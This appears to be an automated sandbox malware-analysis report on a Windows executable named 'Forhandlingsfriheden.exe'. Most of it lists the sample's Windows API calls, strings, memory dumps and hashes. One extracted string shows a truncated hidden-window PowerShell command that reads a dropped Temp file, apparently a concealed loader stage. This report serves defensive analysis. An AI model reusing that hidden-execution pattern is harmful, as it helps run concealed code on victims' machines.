                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bi
                                                                            • API String ID: 2624150263-4221082146
                                                                            • Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                            • Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
                                                                            • Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                            • Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Forhandlingsfriheden.exe"), ref: 00405C76
                                                                            • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Forhandlingsfriheden.exe"), ref: 00405CBE
                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Forhandlingsfriheden.exe"), ref: 00405CE1
                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Forhandlingsfriheden.exe"), ref: 00405CE7
                                                                            • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Forhandlingsfriheden.exe"), ref: 00405CF7
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
                                                                            • FindClose.KERNEL32(00000000), ref: 00405DA6
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5A
                                                                            • "C:\Users\user\Desktop\Forhandlingsfriheden.exe", xrefs: 00405C56
                                                                            • \*.*, xrefs: 00405CB8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\Forhandlingsfriheden.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                            • API String ID: 2035342205-962296748
                                                                            • Opcode ID: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                            • Instruction ID: c1737a7785d2a2f908f5f44de07c4aee1227101a85bdbc8c56ed50a571596083
                                                                            • Opcode Fuzzy Hash: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                            • Instruction Fuzzy Hash: 3241C430800A14BADB216B65CD4DABF7678DF41758F14813BF802B21D1D77C4AC19EAE
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bidragspligtige132, xrefs: 0040228E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bidragspligtige132
                                                                            • API String ID: 542301482-2158749980
                                                                            • Opcode ID: 5b87d2b53e3a3be9ffe6b0ca134cc9b512e0d8dbe994290f8d28894833e6dd44
                                                                            • Instruction ID: 7c9e104ca8be0d6b13ead4f97a80eb64338f0e545dbf3bddd9310e0b0504cb73
                                                                            • Opcode Fuzzy Hash: 5b87d2b53e3a3be9ffe6b0ca134cc9b512e0d8dbe994290f8d28894833e6dd44
                                                                            • Instruction Fuzzy Hash: 54410575A00209AFCB00DFE4CA89AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                                                            • Instruction ID: 9ac6bcba1e22606d8a3f98507846f809c14ae5b1cd4137618ecf9cbbc0e374ac
                                                                            • Opcode Fuzzy Hash: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                                                            • Instruction Fuzzy Hash: D6F08C71A04115AFD710EBA4DA499AEB378EF14328F6001BBE116F31E5D7B88E419B29
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404F45
                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404F50
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
                                                                            • SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00405006
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
                                                                            • DeleteObject.GDI32(00000000), ref: 00405027
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129
                                                                              • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040516B
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
                                                                            • ShowWindow.USER32(?,00000005), ref: 00405189
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 00405357
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405367
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405489
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004054C3
                                                                            • ShowWindow.USER32(?,00000000), ref: 00405511
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 0040551C
                                                                            • ShowWindow.USER32(00000000), ref: 00405523
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 2564846305-813528018
                                                                            • Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                            • Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
                                                                            • Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                            • Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18
                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040471D
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404731
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040474E
                                                                            • GetSysColor.USER32(?), ref: 0040475F
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
                                                                            • lstrlenW.KERNEL32(?), ref: 00404780
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004047FB
                                                                            • SendMessageW.USER32(00000000), ref: 00404802
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040482D
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
                                                                            • SetCursor.USER32(00000000), ref: 00404881
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
                                                                            • SetCursor.USER32(00000000), ref: 0040489D
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048CC
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                            • String ID: : Completed$N
                                                                            • API String ID: 3103080414-2140067464
                                                                            • Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                            • Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
                                                                            • Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                            • Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                            • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                                            • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                            • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406322,?,?), ref: 004061C2
                                                                            • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB
                                                                              • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                              • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                            • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
                                                                            • wsprintfA.USER32 ref: 00406206
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406241
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062EF
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6
                                                                              • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                              • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                            • String ID: %ls=%ls$[Rename]
                                                                            • API String ID: 2171350718-461813615
                                                                            • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                            • Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
                                                                            • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                            • Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD
                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Forhandlingsfriheden.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\Forhandlingsfriheden.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                            • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004067F0
                                                                            • "C:\Users\user\Desktop\Forhandlingsfriheden.exe", xrefs: 00406833
                                                                            • *?|<>/":, xrefs: 00406841
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
